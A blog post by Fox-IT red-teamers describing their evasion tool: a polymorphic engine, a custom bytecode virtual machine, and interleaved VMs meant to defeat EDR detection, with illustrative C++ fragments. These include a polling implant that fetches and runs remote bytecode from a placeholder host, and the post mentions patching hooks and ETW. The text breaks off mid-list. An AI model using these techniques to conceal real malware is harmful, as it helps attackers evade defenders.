Authors: Boudewijn Meijer && Rick Veldhoven

Introduction

As defensive security products improve, attackers must refine their craft. Gone are the days of executing malicious binaries from disk, especially ones well known to antivirus and Endpoint Detection and Response (EDR) vendors. Now, attackers focus on in-memory payload execution for both native and managed applications to evade defensive products. Meanwhile, defensive technologies are becoming increasingly sophisticated, which is forcing attackers to further adapt. In times of such an arms race, how does an attacker stay ahead? And how can malware be future-proofed to evade the sophisticated EDR systems that currently exist and are actively being developed?

This blog post reviews the evolution of one of Fox-IT’s evasive tools, designed to aid in payload delivery during Red Teaming engagements. We will touch on the tool’s history and its future potential in the face of offensive and defensive progress.

Historical Perspective

The core of the arms race between malware and antimalware is as follows: antimalware must classify arbitrary programs, in memory or at rest, as either benign or malicious while operating under a set of constraints. The products are constrained by how much performance a user or customer is prepared to surrender in terms of CPU time, memory or bandwidth while the classification takes place, and by how many false positives the product generates. If the product is too resource intensive, a customer will complain it is slow. If it quarantines important documents, it potentially does more harm than good. These constraints shape and limit each step in the evolution of antimalware products. AV vendors are not the only ones who need to worry about performance: malware authors must take execution speed and other observable system changes into account when deploying malware. Take, for example, the recently uncovered XZ backdoor1, which was spotted by a software engineer due to an increase in login time from 0.2 to 0.8 seconds. Had the authors of this piece of code not observably changed the behavior of the system, the backdoor would likely have been deployed successfully.

Since the early days of viruses circulating on floppy disks, writing undetected malware has been a cat-and-mouse game between attackers and defenders. Originally, antivirus software focused strictly on true-positive detection of viruses on the basis of signatures and patterns in a program’s instructions. Absent a mistake in the signature database, a unique signature match guarantees a true positive, after which the malicious file can be removed or quarantined. This method of detection adheres well to the constraints placed on antimalware products, because simple pattern matches are performant and true-positive detection is almost guaranteed.

For malware authors, the solution was simple: to evade detection, the virus must be made impossible to detect through a unique pattern. This may be achieved by changing the code, or by encrypting the code and decrypting it at runtime. If you automate this, you get what is called a packer: a tool that encrypts, compresses or otherwise changes a virus to evade detection. A packer changes the majority of the code in the virus and adds a stub to the code. This stub is often the first piece of code that is executed when the program is launched. Its job is to undo all changes previously made to the original code (e.g. compression or encryption). After all changes are reverted, execution will be passed to the original code. This stub can also make use of anti-reversing/anti-tampering code that attempts to protect the original code from prying eyes.
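To make the concept concrete, below is a minimal sketch of such a stub, assuming a hypothetical single-byte XOR scheme and an appended payload; the names are illustrative, not those of any real packer, and real stubs must also arrange executable memory, as discussed further on:

#include <stddef.h>
#include <stdint.h>

extern uint8_t payload[];    // the encrypted original code (hypothetical layout)
extern size_t payload_size;
extern uint8_t key;

void stub_entry(void) {
    // Revert the packer's changes in place...
    for (size_t i = 0; i < payload_size; ++i)
        payload[i] ^= key;
    // ...then pass execution to the original code.
    ((void (*)(void))payload)();
}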

This reduces the “attack surface” for signature creation on samples that are on disk or otherwise stored at rest. The same method is also used to compress benign binaries for distribution, allowing for smaller release packages; therefore, not all packed binaries can simply be marked as malicious.

However, even very small unpacker stubs may match a signature that can be uniquely tied to the packer itself. By combining this signature with rules about the amount of entropy in a file, a packer can still be detected with a high degree of accuracy. At this point, the antimalware solution has evolved to utilize metadata about a file, such as entropy, gaining the ability to detect packed files at the cost of a higher false-positive rate.
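To illustrate why entropy is such an attractive signal under the performance constraints described earlier, here is a minimal sketch of the Shannon entropy calculation a scanner might run over a file; packed or encrypted data tends toward the maximum of 8 bits per byte:

#include <cmath>
#include <cstddef>
#include <cstdint>

// Shannon entropy in bits per byte: a single pass plus a 256-entry
// histogram, cheap enough to run on every scanned file.
double shannon_entropy(const uint8_t* data, size_t len) {
    size_t counts[256] = {};
    for (size_t i = 0; i < len; ++i)
        counts[data[i]]++;
    double entropy = 0.0;
    for (int b = 0; b < 256; ++b) {
        if (counts[b] == 0) continue;
        double p = (double)counts[b] / (double)len;
        entropy -= p * std::log2(p);
    }
    return entropy;
}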

The next step in the arms race for malware authors is to eliminate the potential for a signature match in the unpacker stub. This means that the stub must consist of different instructions each time a new sample is created. An important insight is that “what the code does” and “how the code looks” are not a 1:1 mapping. There are infinitely many ways to write computer code that achieves a certain effect or result, and therefore infinitely many ways in which a particular unpacking algorithm can be written. A packer designed to emit an unpacking stub that looks different each time is called polymorphic. The algorithm or code that performs the changes is called a polymorphic engine2.

Combining a packer with a polymorphic engine eliminates the “attack surface” for simple signature matches of malware at rest. Fox-IT has written and maintained two polymorphic packers like this since 2015. Although they still produce good results against modern EDR, even these tools are getting more and more difficult to sneak past defenses. That’s because there’s a conceptual flaw in the polymorphic packer: the original malicious code must still be decrypted at some point in order to execute. If antimalware products can time their scan for malicious patterns to the moment the packer has finished decoding the malicious code, then detecting the malware becomes easy again.

Modern operating systems and processors try to ensure that not all data in a computer’s memory can be executed as code, for safety reasons3. In particular, systems are typically designed to prevent the execution of code from writable pages. Therefore, a virus or malware sample that wants to decrypt and/or decompress its own code must first make the changes in writable memory pages. Afterwards, the virus changes the page protection to readable and executable and transfers control to the newly modified executable memory. Antimalware products equipped to analyze the behavior of other programs at runtime use behavioral patterns like this to decide when to scan the memory of a process for malicious patterns. Because the memory, once made executable, can no longer be modified due to the aforementioned restrictions, the moment a process makes memory executable is the ideal time to scan it for malicious patterns.
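A minimal sketch of the write-then-execute sequence that behavioral engines key on, using the standard Win32 APIs (the decrypted code buffer is a placeholder):

#include <windows.h>
#include <string.h>

void run_decrypted(const unsigned char* code, size_t size) {
    // 1. Allocate writable, non-executable memory and place the code there.
    void* mem = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(mem, code, size);
    // 2. Flip the protection to readable and executable.
    DWORD old;
    VirtualProtect(mem, size, PAGE_EXECUTE_READ, &old);
    // 3. Transfer control: the ideal moment for a defender to scan this process.
    ((void (*)(void))mem)();
}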

Antimalware products equipped with rules that generate additional signals to determine whether a program is malicious are said to employ “heuristics”. Conceptually, antimalware products have achieved a comprehensive set of features to detect malware execution. The evolutions we’ve seen since the early days of these feature-complete products can all be understood as attempts to loosen or lift the constraints set out above: “Cloud-based protection” runs resource-intensive heuristics on someone else’s computer, and the human oversight implied by the “R” in “EDR” lowers the impact of a false positive by bringing humans into the detection and response loop.

How then, can a Red Team smuggle their malware past these new and advanced defenses? In the past, a virus writer might employ what is called a “metamorphic” engine4. This is an algorithm designed to re-write the entire virus each time it infects a new file, including the entire metamorphic engine itself. Using it ensures that there is never one ‘true’ virus sample that can be detected with a static signature; each copy of the virus is completely different. With a tool like this you would not need a packer, because there are no static patterns that can ever be uniquely tied to your virus. However, the explosion in modern software complexity and the requirement for malware to work on a variety of systems make writing a reliable metamorphic engine a prohibitively large undertaking.

Hiding From Analysis: Virtualisation

To hide from both static and dynamic analysis of payloads, the generated sample must be resilient to code inspection and code flow analysis. If the real instructions are not revealed to an observer, hardly any conclusions can be drawn from the outer shell. If this is achieved, defensive products would be met with the following limitations when inspecting the payload:

  • Difficult to observe instruction patterns;
  • Difficult to patch instructions;
  • Difficult to ignore instructions;
  • Difficult to predict behavior.

Hiding instructions is not something new. Products like VMProtect5 cloak parts of the code by embedding a virtual machine and generating unique instructions to be executed on this VM. Code that is to be virtualized must be identified either by a marker added to the source code or by the presence of a PDB file containing the symbols. This requirement cannot always be met when using third-party tools. Additionally, this type of protection is aimed at protecting specific functions, like license key checking algorithms, limiting its usefulness to an adversary. Lastly, using existing tools can have a negative impact on the detection ratio, as these products are heavily researched and can contain static signatures, like hardcoded section names.

Considering the benefits of a virtualisation layer, however, it is clear that this technique is very powerful.

Creating a Custom Virtualisation Layer

It was decided that a virtualisation layer should be created. This layer consists of a virtual machine implementing opcodes6, and bytecode7 executing on the virtual machine. The virtualisation layer must meet the following requirements and limitations:

  1. Bytecode instructions are executed sequentially;
  2. Bytecode instructions are hidden before and after execution;
  3. The instruction set supports basic x86-64 instructions only;
  4. The virtual machine must provide an interface to the system API;
  5. The virtual machine implementation must be simple and position independent to support morphing;
  6. The virtualisation layer must work without access to source code or debug symbols.

Creating the virtualisation layer started with a design of the instructions to be executed, the virtual machine, and the supported instruction set. Additionally, a layout for the final payload was designed in which all data is present in a position-independent format that can be executed like shellcode. This allows the payload to be embedded in other executable formats (e.g. executables or DLLs), and allows for dynamic execution when staging malware.

For example, the following layout would allow for the above functionality. In this example, the virtual machine must start with a stub that sets the virtual machine’s argument registers to their respective values:

Example of a data structure containing all required building blocks within position independent code.

The Anatomy of an Instruction

To keep the virtual machine architecture simple, an instruction format was created with a fixed length across instruction and operand types. This design decision allows the omission of a Length Disassembler Engine (LDE)8; the instruction pointer can simply be used as an index to the current instruction. All information present in normal, non-SSE9/AVX10 x86 instructions must be included.

At its core, an instruction identifies the operation that must be performed, and optionally what data is provided in the form of operands. An operand can be one of three types:

  1. Immediate value: a constant value embedded in the instruction;
  2. Memory location: a memory location pointed to by the instruction;
  3. Register: a register, or part of one, identified by the instruction.

In order to obtain data from an operand, a generic format must be created that encompasses the different operand types. It was decided that a single 64-bit field could be used to hold the different types of operands, as all of the necessary data of the aforementioned types can be embedded into 64 bits.

The structures below show the layout of each operand type:


struct ImmediateOperand {
    Value value;          // A constant value
};                        // size: 8 bytes

struct MemoryOperand {
    uint8_t size;         // The effective size of the operand (8, 16, 32, 64 bits)
    uint8_t base;         // A register holding a pointer value to the base address
    uint8_t index;        // A register holding the index of the array
    uint8_t scale;        // A constant multiplier of 1, 2, 4, or 8
    int32_t displacement; // A value to be added to the calculated address
};                        // size: 8 bytes

struct RegisterOperand {
    uint8_t reg;          // A base register of the x86-64 register set
    uint8_t chunk;        // The specific register chunk: low, high, word, dword, qword
    uint16_t size;        // The effective size of the operand (8, 16, 32, 64 bits)
    uint32_t pad;         // Padding to meet the 64-bit size requirement
};                        // size: 8 bytes

union Operand {
    ImmediateOperand imm; // View the data as an immediate operand
    MemoryOperand mem;    // View the data as a memory operand
    RegisterOperand reg;  // View the data as a register operand
};                        // size: 8 bytes


Note: The Value type of the immediate operand is a simple union with (u)int8_t to (u)int64_t members. This makes it trivial to index the correct data during implementation of opcodes.
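The later opcode_bt example accesses members named u8 through u64, so a minimal sketch of Value consistent with that usage could look as follows:

union Value {
    int8_t  i8;  uint8_t  u8;
    int16_t i16; uint16_t u16;
    int32_t i32; uint32_t u32;
    int64_t i64; uint64_t u64;
}; // size: 8 bytes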

To indicate the instruction’s opcode, a single 1-byte value can be used. This provides 256 unique opcodes, which should be enough to implement basic behavior. Lastly, the type of each operand must be embedded within the instruction format, as opcode implementations must be able to interrogate these types.


struct Instruction {
    uint8_t opcode;          // The opcode of the instruction
    uint8_t lparam_type : 4; // The type of the first (left) operand
    uint8_t rparam_type : 4; // The type of the second (right) operand
    Operand lparam;          // The first (left) operand
    Operand rparam;          // The second (right) operand
}; // size: 18 bytes


Protecting Instructions

To meet requirement two, “Bytecode instructions are hidden before and after execution”, instructions are protected using encryption. Many encryption algorithms can be used to hide instructions. However, the encryption must preserve the instruction size, as each instruction is decrypted and encrypted in place rather than moved to a temporary buffer. This removes the necessity for dynamic memory allocation from within the virtual machine. Additionally, the chosen encryption scheme must be trivial to implement, as the code will be located in the virtual machine and thus create an ‘attack surface’ for signature detection. Implementing complex algorithms is detrimental to the ability to effectively manipulate the code using a polymorphic engine.
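As an illustration only (the actual scheme is not disclosed here), a size-preserving XOR keystream keyed by the instruction index satisfies these constraints; KEY_BYTE is a hypothetical per-payload constant:

void crypt_instruction(Context* vm, uint32_t ip) {
    // XOR is its own inverse: calling this twice restores the original
    // bytes, so decrypt_instruction and encrypt_instruction can share it.
    uint8_t* bytes = (uint8_t*)&vm->instructions[ip];
    for (size_t n = 0; n < sizeof(Instruction); ++n)
        bytes[n] ^= (uint8_t)(KEY_BYTE ^ (ip * 31 + n)); // size-preserving keystream
}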

The Anatomy of the Virtual Machine

The virtual machine resembles a virtual CPU, implementing all the available opcodes. Furthermore, the available registers, CPU flags, and stack are part of the virtual machine object. Lastly, the virtual machine holds a pointer to the bytecode buffer necessary for execution. An added benefit of implementing the virtual machine is that the real stack is also abstracted away. Heuristics that attempt to spot malicious behavior from the stack will not succeed.


struct Context {
    uint32_t ip;               // Instruction pointer
    uint8_t flags;             // CPU flags to be manipulated by opcodes
    Register registers[17];    // General purpose registers (rax, ... r15 and gs)
    Instruction* instructions; // A pointer to the start of the bytecode buffer
    uint8_t stack[STACK_SIZE]; // The virtual machine stack
};


Functions to initialize the virtual machine context, to obtain the current instruction, and to load and store values based on the instruction operands were created to aid in the implementation of opcodes within the virtual machine.
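A minimal sketch of two of these helpers, under the assumption that the fixed instruction length lets the instruction pointer act as a plain array index:

Instruction* get_current_instruction(Context* vm) {
    return &vm->instructions[vm->ip]; // ip is an index, not a byte offset
}

void next_instruction(Context* vm) {
    vm->ip++; // sequential execution, per requirement one
}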

Once initialized, the virtual machine can enter its dispatch loop. This loop consists of obtaining the current instruction and executing the opcode identified by the opcode field in the instruction object. The instruction is decrypted before execution and is encrypted after. A dispatch function could be implemented as follows:


void dispatch_instruction(Context* vm) {
    uint32_t ip = vm->ip;
    decrypt_instruction(vm, ip);
    switch (vm->instructions[ip].opcode) {
        case Opcode::ADD: opcode_add(vm); next_instruction(vm); break;
        case Opcode::AND: opcode_and(vm); next_instruction(vm); break;
        case Opcode::BT:  opcode_bt(vm);  next_instruction(vm); break;
    }
    encrypt_instruction(vm, ip);
}


An attentive reader may have noticed the construction of the temporary variable ip, which is used in further operations. This is necessary because instructions that modify the instruction pointer, like jcc, call, and ret, leave a modified instruction pointer behind when the opcode is finished. The instruction pointer can therefore no longer be used to re-encrypt the instruction that was just executed.

Implementation of a Basic Opcode

The following function implements the bit test (bt) opcode11:


void opcode_bt(Context* vm) {
    // Get the current instruction from the context
    Instruction* i = get_current_instruction(vm);
    // Load the value and the bit to test
    Value dst = fetch_value(vm, i->lparam_type, i->lparam);
    Value src = fetch_value(vm, i->rparam_type, i->rparam);
    // Get the size in bits of the value to check
    size_t size = get_operand_size(i->lparam_type, i->lparam);
    // Set the carry flag to the result of the bit test
    switch (size) {
        case 8:  vm->flags.cf = (dst.u8  & (1 << src.u8))  != 0; break;
        case 16: vm->flags.cf = (dst.u16 & (1 << src.u16)) != 0; break;
        case 32: vm->flags.cf = (dst.u32 & (1 << src.u32)) != 0; break;
        case 64: vm->flags.cf = (dst.u64 & (1ull << src.u64)) != 0; break;
    }
}


Improving the Bytecode Process: Transpiling

Initially, all bytecode created to execute in the virtual environment was written in assembly by hand. This provided the control needed to make sure specific opcodes and operand types were used, and as a test a PE loader was implemented in bytecode. As this approach came at a major cost in development time and flexibility, a new method of generating bytecode was adopted: compiling C/C++ programs and transpiling the result. This was chosen over using the assembler’s textual output directly, as parsing those text files proved to be cumbersome and error-prone. Instead, the resulting linked binary was fed to a disassembler.

The disassembling of a binary is performed using the iced-x86 library12. This library allows for the conversion of x86 instructions to the custom format (described in the earlier section “The Anatomy of an Instruction”) by checking the opcode of the instruction, the types of the operand(s) and their value(s). Once all the x86 instructions are converted, the transpiled bytecode can be interpreted by the virtual machine.
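A minimal sketch of the conversion step; DecodedX86 and the map_* helpers are hypothetical stand-ins for iced-x86’s decoded instruction and the real mapping logic, which covers far more opcodes and operand kinds:

Instruction transpile(const DecodedX86& x) {
    Instruction out = {};
    out.opcode = map_mnemonic(x.mnemonic);     // e.g. x86 add -> Opcode::ADD
    out.lparam_type = map_operand_kind(x.op0); // immediate, memory or register
    out.rparam_type = map_operand_kind(x.op1);
    out.lparam = map_operand(x.op0);           // fill the 64-bit Operand union
    out.rparam = map_operand(x.op1);
    return out;
}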

The bytecode generation process from source code to eventual bytecode.

The implementation of the transpiler instantly enabled us to support a large number of existing tools, and made writing new tools easier. Most Position-independent Code (PIC)13 tools that compile from C/C++, including some BOFs14, can also be ported to execute on the virtual machine with relative ease.

Limitations to Bytecode Implementation

One of the limitations of the virtual machine implementation is shared with that of the bytecode. PIC must be created in order to generate valid bytecode that executes on the VM. In practice, this means that everything is relative to the current instruction pointer, and no references to other libraries or parts of other sections can exist:

  • No static variables;
  • No global variables;
  • No strings;
  • No static dependencies on libraries.

Supporting Native API Calls

To allow interfacing with the OS layer, bytecode must be able to perform native API calls, so a translation layer must exist between the bytecode and native environment. The call instruction is used by compilers to invoke APIs, requiring the virtual machine’s call implementation to support this translation. Unfortunately, once a call instruction is encountered, the virtual machine has no information about the number of arguments that must be forwarded. To resolve this problem, the bytecode can prepend the number of arguments when calling an API, giving the virtual machine layer enough information to translate the call into native execution. To programmatically perform this task, variadic arguments in C++ templates can be used to automatically deduce the number of arguments passed:


template <typename T> struct apicall; // primary template, specialized below

template <typename Ret, typename... Args>
struct apicall<Ret(Args...)> {
    static decltype(auto) call(const void* target, Args... args) {
        constexpr size_t nargs = sizeof...(Args); // Calculate the number of arguments passed
        using f = Ret(__stdcall*)(size_t, Args...); // Define the signature of the API to call
        return ((f)target)(nargs, args...); // Invoke the API and return its result
    }
};

int main() {
    FARPROC _Sleep = get_address_of_sleep();
    apicall<decltype(Sleep)>::call(_Sleep, 10'000);
    return 0;
}


As specified in Microsoft’s x64 __stdcall15 calling convention, the first four integer or pointer arguments are passed using the registers rcx, rdx, r8 and r9, with the remaining arguments being passed on the stack. This means that at the time of executing the call instruction, rcx holds the number of arguments that must be passed to the API. The virtual machine can extract and inspect this value, and use it to correctly perform the call:


auto target = fetch_value(vm, i->lparam_type, i->lparam);
auto nargs = vm->registers.rcx.qword;
// Extract the arguments from rdx, r8, r9 and the stack
// Invoke the API
auto result = syscall(target, ...);
// Return the result to the bytecode environment
vm->registers.rax = result;


The real values of the arguments are stored in rdx, r8, r9 and on the stack. When extracting the arguments from the stack, one must remember to keep the shadow space16 in mind.
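A minimal sketch of that extraction, assuming register accessors as in the snippet above, a virtual stack pointer in rsp, and that the virtualized call has not yet pushed a return address onto the virtual stack:

// rcx held the argument count, so the real arguments start at rdx.
uint64_t args[16] = {};
args[0] = vm->registers.rdx.qword;
args[1] = vm->registers.r8.qword;
args[2] = vm->registers.r9.qword;
// Remaining arguments sit past the 0x20-byte shadow space the caller
// reserved for the four register arguments.
uint64_t* stack = (uint64_t*)vm->registers.rsp.qword;
for (size_t n = 3; n < nargs && n < 16; ++n)
    args[n] = stack[4 + (n - 3)];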

Visually, the process looks like this:

A virtualized call instruction invokes ntdll!NtAllocateVirtualMemory. This call is translated to a native call and the API is invoked. The resulting value is returned to the VM.

Supporting Bytecode Function Callbacks

Keeping in mind the porting of existing programs to the bytecode architecture, one cannot omit the support for function callbacks within code. Take for example a simple linked list implementation, with a list_search function taking a predicate callback:


struct Node {
    int value;
    Node* next;
};

struct SearchContext {
    int value;
};

Node* list_search(Node* head, bool (*predicate)(Node* n, const void* ctx), const void* ctx);

bool searcher(Node* n, const void* ctx) {
    return n->value == ((SearchContext*)ctx)->value;
}

int main() {
    Node head;
    // initialize and populate list
    SearchContext ctx = { 10 };
    Node* found = list_search(&head, searcher, &ctx);
    return 0;
}


However, a problem arises: how does the virtual machine differentiate between a normal bytecode function call, a native API call, and a function callback? The difference between the first two is clear: the bytecode function call is a call to an address within the bytecode and is known at compile time, whereas the API call is a dynamic call, meaning a call to a function pointer stored in a register or memory location. Given that a callback within bytecode is a dynamic call too, the virtual machine must be provided with information about the type of call being made.

To load a function pointer as an argument, a lea17 instruction is generated with its right operand referencing a memory address. This referenced memory address uses the instruction pointer (rip) register as the base field of the memory operand. When transpiling, such cases can be identified. To store this information, a new type of operand (e.g. Function) can be added to the three existing types listed in “The Anatomy of an Instruction”. When the virtual machine executes the lea instruction, it can check the type of the operand. If this operand’s type is Function, a tag can be added to the high 32 bits of the value, for example 0xDEADBEEF.


value = (0xDEADBEEFull << 32) | (value & 0xffffffff);


Once the call instruction is invoked, the value of the operand can be interrogated. If this value contains the previously added tag, a callback is requested. To perform the call, the tag is stripped from the value and the instruction pointer can be set accordingly.
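A minimal sketch of that check inside the virtual machine’s call implementation; vm_push is a hypothetical helper that pushes a value onto the virtual stack:

uint64_t target = fetch_value(vm, i->lparam_type, i->lparam).u64;
if ((target >> 32) == 0xDEADBEEF) {
    // Tagged pointer: a callback into bytecode rather than a native API.
    vm_push(vm, vm->ip + 1);                  // return address within the bytecode
    vm->ip = (uint32_t)(target & 0xffffffff); // strip the tag and jump
} else {
    // Untagged: translate to a native API call as shown earlier.
}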

Supporting User-Defined Arguments

Depending on the type of program that is executing, user-defined arguments are required. Take for example a program that simply sleeps for a period of time. How long should this program sleep for? Hardcoding these values is not always an option. Early on in the development of the project, a simple data structure was defined which could be provided to the bytecode’s entry point:


struct Data {
    size_t size;           // Size of data including the `Data` header
    uint8_t key[KEY_SIZE]; // Decryption key of the payload
    uint8_t payload[0];    // Payload data
};

int bytecode_main(Data* data);


Accompanying this, each bytecode project contained a script that packaged data in a way that could be understood by the bytecode. However, there was no consistency between these scripts and the method of extraction. For example, extracting two 4-byte integers is simpler than extracting two strings due to their variable size.

To standardize this process, and to include it in the build step itself instead of relying on ad-hoc scripts, a key-value solution was created in combination with an API that can interrogate the type and value of each argument. This is different from the parameter packing that Cobalt Strike uses in its BOFs18, as default arguments, or arguments that are not strictly required, are supported. Additionally, each argument is encrypted separately. This allows a PE packer to extract domain-keying information before extracting the PE data.

The following API is defined:


enum Type {
    Invalid, Boolean, Integer, String, Data
};

struct Argument {
    size_t size;           // The size of the argument including the header
    Type type;             // The type of the argument
    size_t tag;            // The identifying tag of the argument
    uint8_t key[KEY_SIZE]; // The payload encryption key
    uint8_t payload[0];    // The argument data
};

struct Arguments {
    size_t size;          // The total size of all arguments in bytes
    size_t count;         // The count of arguments present in the argument pack
    uint8_t arguments[0]; // The argument data
};

bool has_argument(Arguments* args, size_t tag);
Argument* get_argument_by_tag(Arguments* args, size_t tag);
void decrypt_argument(Argument* arg);
void encrypt_argument(Argument* arg);

// Utility functions to interpret the argument's payload
bool get_argument_boolean(Argument* arg);
int64_t get_argument_integer(Argument* arg);
char* get_argument_string(Argument* arg);
void* get_argument_data(Argument* arg, size_t* size);


The signature of the bytecode’s entry point is updated to incorporate this change:


int bytecode_main(Arguments* args);

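For illustration, bytecode could consume a sleep duration as follows; the TAG_SLEEP tag and the fallback value are hypothetical:

int bytecode_main(Arguments* args) {
    int64_t sleep_ms = 10'000; // hypothetical default when the argument is absent
    if (has_argument(args, TAG_SLEEP)) {
        Argument* arg = get_argument_by_tag(args, TAG_SLEEP);
        decrypt_argument(arg);                // each argument is encrypted separately
        sleep_ms = get_argument_integer(arg);
        encrypt_argument(arg);                // re-hide the value after use
    }
    // ... sleep for sleep_ms milliseconds ...
    return 0;
}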

Supporting DLLs

Executables and DLLs are very similar in the way they look and in the way they execute. Both have an entry point to which execution is passed, and both return a value. However, the execution flow of an executable starts at the entry point and does not return from it until the program stops. DLLs often perform very limited initialization within their entry point and return execution to the loader, so as not to block the loader threads. Additionally, the entry point of a DLL is called more than once: on process startup and shutdown, and on thread creation and destruction. The reason for calling the entry point is passed by the loader in the second argument, dwReason. This allows the code inside the DllMain function to differentiate between the reasons the entry point was invoked and act accordingly.


BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);


To allow our shellcode to be embedded within DLLs, both the virtual machine and its bytecode must be made aware of the reason for invocation. This requires the entry point of the virtual machine and bytecode to match that of a DLL, automatically receiving the reason by the OS loader. This does not interfere with the entry point used by a normal executable, as the default entry point of any executable does not take any arguments directly, but instead the arguments argc and argv are resolved by the C runtime, which is not linked against.

On initialization, the virtual machine sets the bytecode’s rdx register to the value of its reason argument, passing the value to the entry point as the second argument. The programmer must decide whether this value is to be inspected within the bytecode, and should not rely on it when writing bytecode to be embedded in an executable.
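A minimal sketch of a bytecode entry point inspecting the forwarded reason; the two-argument signature is an assumption of this design, and the constant matches DLL_PROCESS_ATTACH from the Windows headers:

int bytecode_main(Arguments* args, unsigned long reason) {
    // When embedded in a DLL, the VM copies its own DllMain reason into
    // rdx, so it arrives here as the second argument.
    if (reason == 1 /* DLL_PROCESS_ATTACH */) {
        // perform one-time initialization
    }
    return 1;
}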

Deceiving Behavioral Analysis: Multi-VM Execution

Earlier, the method of detection based on behavior was discussed. This dynamic form of inspecting an application’s execution flow, regardless of static patterns, is difficult for attackers to rid their malware of. Opening Lsass.exe and reading its memory could be marked as malicious, even if the process looks like calc.exe. Often, defensive products receive events via kernel callbacks, such as PsSetCreateProcessNotifyRoutine19 or PsSetLoadImageNotifyRoutine20, via API/syscall hooks in the local process, or by using Event Tracing for Windows (ETW)21 consumers.

Patching hooks in the local process, along with the local ETW functions that provide events, is trivial. This rids the process of intrusive monitoring by antivirus or EDR solutions, and stops the process from creating events. However, some events are still generated, mostly by the ETW providers present in the kernel, along with the kernel callbacks. Additionally, events created during patching could still be monitored. Lastly, blinding defensive products could have a negative effect, as failure to receive check-ins could be considered an error and a signal of malicious behavior in itself.

As an attacker, generating arbitrary events along with ones that might cause detection could be a method of thwarting dynamic detection rules based on behavior. Adding code to generate events in between regular instructions would require manipulation of source code, and is not preferred. Creating a new thread that generates random events could be in vain, as events are registered per unique thread in the process.

The virtual machine was extended to support vmcalls. These types of call instructions made by the bytecode notify the virtual machine layer that a task needs to be performed. Among multiple different supported calls, most noteworthy are the following:

  • vminit: Initialize the virtual machine object with bytecode and arguments
  • vmexec: Execute N cycles on the virtual machine

The combination of these two calls allows bytecode to create a new virtual machine, and execute a predetermined number of instructions:


#define NUM_CYCLES 200

// Load the malicious bytecode and create a VM object
auto malicious = load_malicious_instructions();
auto malicious_vm = allocate_vm_object();

// Load the bytecode creating events
auto events = load_event_bytecode();
auto events_vm = allocate_vm_object();

// Initialize the VM objects with their bytecode and no arguments
vmcall<vminit>::call(malicious_vm, malicious, nullptr);
vmcall<vminit>::call(events_vm, events, nullptr);

while (true) {
    vmcall<vmexec>::call(malicious_vm, NUM_CYCLES);
    vmcall<vmexec>::call(events_vm, NUM_CYCLES);
}


Because both sets of bytecode execute within the same native thread, interleaved by the virtual machine, no distinction can be made between the origin of each event. The OS and any event consumers will observe a single thread generating multiple events, both benign and possibly malicious. Most importantly for an attacker, this could break the patterns of behavior being monitored for.

As an additional benefit of these added instructions, bytecode can now be obtained and executed at runtime. This proved to be an extremely useful feature during payload development, as bytecode can be provided over Command and Control instead of staged shellcode. This removes the necessity of allocating executable memory regions (or changing memory protection at a later stage) to execute shellcode in, in turn removing the opportunity for defensive products to inspect the buffers used for dynamic code execution often leveraged by attackers.

For example, the following behavior could be implemented to create a simple polling implant, requesting bytecode every 10 seconds:


// Allocate the virtual machine object
auto vm = allocate_vm_object();

while (true) {
    // Attempt to obtain bytecode from the server
    void* bytecode = http_get("https://example.com/bytecode");
    // Check if we received bytecode
    if (bytecode) {
        // Initialize the VM object with our bytecode and execute it in its entirety
        vmcall<vminit>::call(vm, bytecode, nullptr);
        vmcall<vmexec>::call(vm, RUN_UNTIL_END);
    }
    // Free the bytecode buffer and sleep for 10 seconds
    free(bytecode);
    sleep(10'000);
}


Protecting the Virtual Machine

At this point, we have defeated most of the detection measures that we are aware of and set out to defeat. However, the VM shares a fundamental weakness with the original packers: static patterns in the native-code VM. Throughout its development, the VM was kept as simple as possible, adhering to constraints that allow a polymorphic engine to operate on the VM’s binary code. This made development significantly more cumbersome but, given a sufficiently strong polymorphic engine, does close the detection loop fully. The polymorphic engine we developed has been battle-tested over several years of use against modern EDR and antimalware products. Despite the fact that the code of the engine was designed years ago, and has not significantly changed since, it still manages to mutate malicious code to the extent that it goes undetected at runtime and scan time.

Due to the way the universe works, the engine cannot support arbitrary programs. The largest constraint is that dynamic control flow is not supported. This means that indirect function calls, indirect jumps and the ret instruction could all potentially break the mutated code. Our engine assumes you know what you’re doing, and won’t complain when such instructions are encountered, but the resulting code will likely not work as intended.

The polymorphic engine supports several different mutation techniques, including:

  • Instruction substitution: replacing instructions with semantically equivalent ones, for example replacing mov eax, 0 with xor eax, eax (see the sketch after this list);
  • Basic block reordering: changing the order of basic blocks in the code;
  • Basic block creation: inserting new basic blocks into the code, through jumps and push-ret pairs;
  • NOP instruction insertion: inserting NOP instructions to change the code’s layout.
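A minimal sketch of a substitution rule, assuming a hypothetical pass over decoded native instructions (the ins fields and emit_* helpers are illustrative, not the engine’s real interface):

// "mov eax, 0" (B8 00 00 00 00) and "xor eax, eax" (31 C0) are
// semantically equivalent; padding with NOPs preserves the code layout.
if (ins.mnemonic == X86_MOV && ins.op_is_reg32(0) && ins.op_is_imm_zero(1)) {
    emit_xor_reg_reg(out, ins.reg(0)); // 2 bytes
    emit_nops(out, ins.length - 2);    // keep the original instruction length
} else {
    emit_copy(out, ins);               // no rule matched: copy verbatim
}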

The most important feature is that the output of the engine can be fed back into the engine again. This allows for multiple iterations of mutation, which leads to virtually incomprehensible disassembly. This is especially useful when the input is a small piece of code, like a shellcode loader. A sufficient number of mutation passes will double or quadruple the size of the output, further muddying the waters for defenders.

Conclusion

Due to the ever-changing security landscape, both attackers and defenders must stay on their toes. Defensive security products continue to improve over time, making it more difficult for attackers to remain undetected, or even execute malicious code at all. Detection of payloads has shifted from static analysis to a combination of heuristics and signatures, rendering some tools obsolete.

In this blog post, we have described a tool that was written to tackle both static and dynamic analysis by way of virtualisation. This technique, combined with a custom polymorphic engine, attempts to evade these types of analysis through layers of obfuscation. To bypass heuristic analysis, support for multiple virtual machines running concurrently was added, disrupting patterns in the created events. As an added bonus, reverse engineering a sample without prior knowledge could be a daunting task. Analysts would have to reverse not only the morphed virtual machine itself, but also extract the morphed bytecode for further analysis. This does not eliminate the risk of payloads being reverse engineered, but it does significantly slow down the process, buying the attacker more time.

In practice, this project has allowed attacks to remain undetected during Red Teaming and TIBER exercises in some of the most heavily monitored environments, making use of state-of-the-art EDR solutions. Moreover, due to the addition of a transpiler converting compiled binaries into custom bytecode, both the speed and the ease of development of custom payloads were greatly improved.

The following is a non-exhaustive list of payloads that were created during a recent Red Teaming exercise, successfully evading detection:

  • Multiple persistence modules;
